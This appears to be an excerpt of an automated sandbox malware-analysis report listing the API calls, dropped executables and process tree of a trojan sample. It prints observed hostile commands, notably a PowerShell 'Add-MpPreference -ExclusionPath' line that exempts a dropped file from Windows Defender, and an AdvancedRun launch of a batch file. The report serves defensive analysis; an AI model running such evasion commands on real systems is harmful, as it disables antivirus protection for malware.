Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister, 22_2_6A91F7C0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9597C0 ZwTerminateProcess, 22_2_6A9597C0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A920FFD RtlInitUnicodeString,ZwQueryValueKey, 22_2_6A920FFD
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A0FEC ZwDuplicateObject,ZwDuplicateObject, 22_2_6A9A0FEC
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9437EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory, 22_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959710 ZwQueryInformationToken, 22_2_6A959710
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A6715 memset,memcpy,ZwTraceEvent, 22_2_6A9A6715
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A949702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker, 22_2_6A949702
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 22_2_6A94E730
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959730 ZwQueryVirtualMemory, 22_2_6A959730
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9CCF30 ZwAlertThreadByThreadId, 22_2_6A9CCF30
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959750 ZwQueryInformationThread, 22_2_6A959750
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A5F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose, 22_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959740 ZwOpenThreadToken, 22_2_6A959740
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A950F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose, 22_2_6A950F48
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory, 22_2_6A94174B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959F70 ZwCreateIoCompletion, 22_2_6A959F70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959770 ZwSetInformationFile, 22_2_6A959770
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9CCF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose, 22_2_6A9CCF70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A916F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap, 22_2_6A916F60
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8F6A RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9E8F6A
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95AF60 ZwSetTimer2, 22_2_6A95AF60
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose, 22_2_6A9A176C
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A993C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString, 22_2_6A993C93
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 22_2_6A9D4496
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95A480 ZwInitializeNlsFiles, 22_2_6A95A480
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E9CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9E9CB3
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E4CAB ZwTraceControl, 22_2_6A9E4CAB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9E8CD6
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A912CDB RtlFreeHeap,ZwClose,ZwSetEvent, 22_2_6A912CDB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D14FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9D14FB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9C64FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose, 22_2_6A9C64FB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 22_2_6A91F4E3
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A1CE4 ZwQueryInformationProcess, 22_2_6A9A1CE4
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A950413 ZwUnmapViewOfSection, 22_2_6A950413
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8C14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9E8C14
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1411 ZwTraceEvent, 22_2_6A9D1411
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93FC39 ZwAssociateWaitCompletionPacket, 22_2_6A93FC39
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95A420 ZwGetNlsSectionPtr, 22_2_6A95A420
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A915450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread, 22_2_6A915450
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A1C49 ZwQueryInformationProcess, 22_2_6A9A1C49
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959C40 ZwAllocateVirtualMemoryEx, 22_2_6A959C40
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959C70 ZwAlpcConnectPort, 22_2_6A959C70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A955C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory, 22_2_6A955C70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8C75 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9E8C75
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A1C76 ZwQueryInformationProcess, 22_2_6A9A1C76
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint, 22_2_6A94AC7B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9C3C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory, 22_2_6A9C3C60
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 22_2_6A93746D
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A913591 ZwSetInformationFile, 22_2_6A913591
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A92DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData, 22_2_6A92DD80
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9DB581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9DB581
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1582 ZwTraceEvent, 22_2_6A9D1582
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9595B0 ZwSetInformationThread, 22_2_6A9595B0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959DB0 ZwAlpcSetInformation, 22_2_6A959DB0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9165A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 22_2_6A9165A0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959DA0 ZwAlpcSendWaitReceivePort, 22_2_6A959DA0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9145D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread, 22_2_6A9145D0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9595D0 ZwClose, 22_2_6A9595D0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9CFDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9CFDD3
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A914DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation, 22_2_6A914DC0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9595C0 ZwSetEvent, 22_2_6A9595C0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93EDC4 ZwCancelWaitCompletionPacket, 22_2_6A93EDC4
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9195F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads, 22_2_6A9195F0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9595F0 ZwQueryInformationFile, 22_2_6A9595F0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9CBDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 22_2_6A9CBDFA
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959DE0 ZwAssociateWaitCompletionPacket, 22_2_6A959DE0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A1D0B ZwSetInformationProcess, 22_2_6A9A1D0B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8D34 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9E8D34
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A944D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 22_2_6A944D3B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A941520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A941520
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959520 ZwWaitForSingleObject, 22_2_6A959520
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9CFD22 ZwQueryInformationProcess,RtlUniform, 22_2_6A9CFD22
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E1D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence, 22_2_6A9E1D55
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A1D43 ZwQueryInformationThread, 22_2_6A9A1D43
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959D70 ZwAlpcQueryInformation, 22_2_6A959D70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A1570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose, 22_2_6A9A1570
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A1D6A ZwWaitForMultipleObjects, 22_2_6A9A1D6A
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D6D61 ZwAllocateVirtualMemoryEx, 22_2_6A9D6D61
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 23_2_028648D8 NtAllocateVirtualMemory, 23_2_028648D8
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 23_2_028648D0 NtAllocateVirtualMemory, 23_2_028648D0
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_00401915 Sleep,NtTerminateProcess, 28_2_00401915
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_00402040 NtQuerySystemInformation, 28_2_00402040
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_00402242 NtQuerySystemInformation, 28_2_00402242
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_00402313 NtOpenKey, 28_2_00402313
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_00401921 Sleep,NtTerminateProcess, 28_2_00401921
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_00401931 Sleep,NtTerminateProcess, 28_2_00401931
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_00402535 NtEnumerateKey, 28_2_00402535
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_00401938 Sleep,NtTerminateProcess, 28_2_00401938
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_00401FD8 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation, 28_2_00401FD8
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_00401FFE NtQuerySystemInformation,LocalAlloc, 28_2_00401FFE
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_00402190 NtQuerySystemInformation, 28_2_00402190
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_00401493 NtAllocateVirtualMemory, 28_2_00401493
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_0040199B Sleep,NtTerminateProcess, 28_2_0040199B
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Code function: 28_2_004021B5 NtQuerySystemInformation, 28_2_004021B5
Source: CD0D.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 3D1.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: B82B.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C1B2.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 9C1A.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: fijbuft.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 25Kf6vSBoq.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\irjbuft Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@44/20@59/8
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Code function: 27_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 27_2_00401306
Source: 25Kf6vSBoq.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Code function: 27_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource, 27_2_0040A33B
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\25Kf6vSBoq.exe 'C:\Users\user\Desktop\25Kf6vSBoq.exe'
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Process created: C:\Users\user\Desktop\25Kf6vSBoq.exe 'C:\Users\user\Desktop\25Kf6vSBoq.exe'
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6EC5.exe C:\Users\user~1\AppData\Local\Temp\6EC5.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\irjbuft C:\Users\user\AppData\Roaming\irjbuft
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Process created: C:\Users\user\AppData\Local\Temp\6EC5.exe C:\Users\user~1\AppData\Local\Temp\6EC5.exe
Source: C:\Users\user\AppData\Roaming\irjbuft Process created: C:\Users\user\AppData\Roaming\irjbuft C:\Users\user\AppData\Roaming\irjbuft
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\B82B.exe C:\Users\user~1\AppData\Local\Temp\B82B.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C1B2.exe C:\Users\user~1\AppData\Local\Temp\C1B2.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\CD0D.exe C:\Users\user~1\AppData\Local\Temp\CD0D.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\DF9C.exe C:\Users\user~1\AppData\Local\Temp\DF9C.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EA8A.exe C:\Users\user~1\AppData\Local\Temp\EA8A.exe
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Process created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F4BC.exe C:\Users\user~1\AppData\Local\Temp\F4BC.exe
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Process created: C:\Users\user\AppData\Local\Temp\DF9C.exe DF9C.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\irjbuft C:\Users\user\AppData\Roaming\irjbuft
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3D1.exe C:\Users\user~1\AppData\Local\Temp\3D1.exe
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /SpecialRun 4101d8 6864
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\DF9C.exe 'C:\Users\user~1\AppData\Local\Temp\DF9C.exe'
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\DF9C.exe 'C:\Users\user~1\AppData\Local\Temp\DF9C.exe'
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process created: C:\Users\user\AppData\Local\Temp\DF9C.exe DF9C.exe
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process created: C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Roaming\irjbuft Process created: C:\Users\user\AppData\Roaming\irjbuft C:\Users\user\AppData\Roaming\irjbuft
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user~1\AppData\Local\Temp\603c0340b4\sqtvvs.exe'
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Process created: C:\Users\user\Desktop\25Kf6vSBoq.exe 'C:\Users\user\Desktop\25Kf6vSBoq.exe' Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6EC5.exe C:\Users\user~1\AppData\Local\Temp\6EC5.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\B82B.exe C:\Users\user~1\AppData\Local\Temp\B82B.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C1B2.exe C:\Users\user~1\AppData\Local\Temp\C1B2.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\CD0D.exe C:\Users\user~1\AppData\Local\Temp\CD0D.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\DF9C.exe C:\Users\user~1\AppData\Local\Temp\DF9C.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EA8A.exe C:\Users\user~1\AppData\Local\Temp\EA8A.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\F4BC.exe C:\Users\user~1\AppData\Local\Temp\F4BC.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Process created: C:\Users\user\AppData\Local\Temp\6EC5.exe C:\Users\user~1\AppData\Local\Temp\6EC5.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\irjbuft Process created: C:\Users\user\AppData\Roaming\irjbuft C:\Users\user\AppData\Roaming\irjbuft Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Process created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\B82B.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B82B.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process created: C:\Users\user\AppData\Local\Temp\DF9C.exe DF9C.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process created: C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe' /SpecialRun 4101d8 6864
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user~1\AppData\Local\Temp\603c0340b4\sqtvvs.exe'
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Code function: 27_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 27_2_00408FC9
Source: C:\Windows\explorer.exe File created: C:\Users\user~1\AppData\Local\Temp\6EC5.tmp Jump to behavior
Source: EA8A.exe, 00000018.00000000.417957368.0000000000FA2000.00000002.00020000.sdmp Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
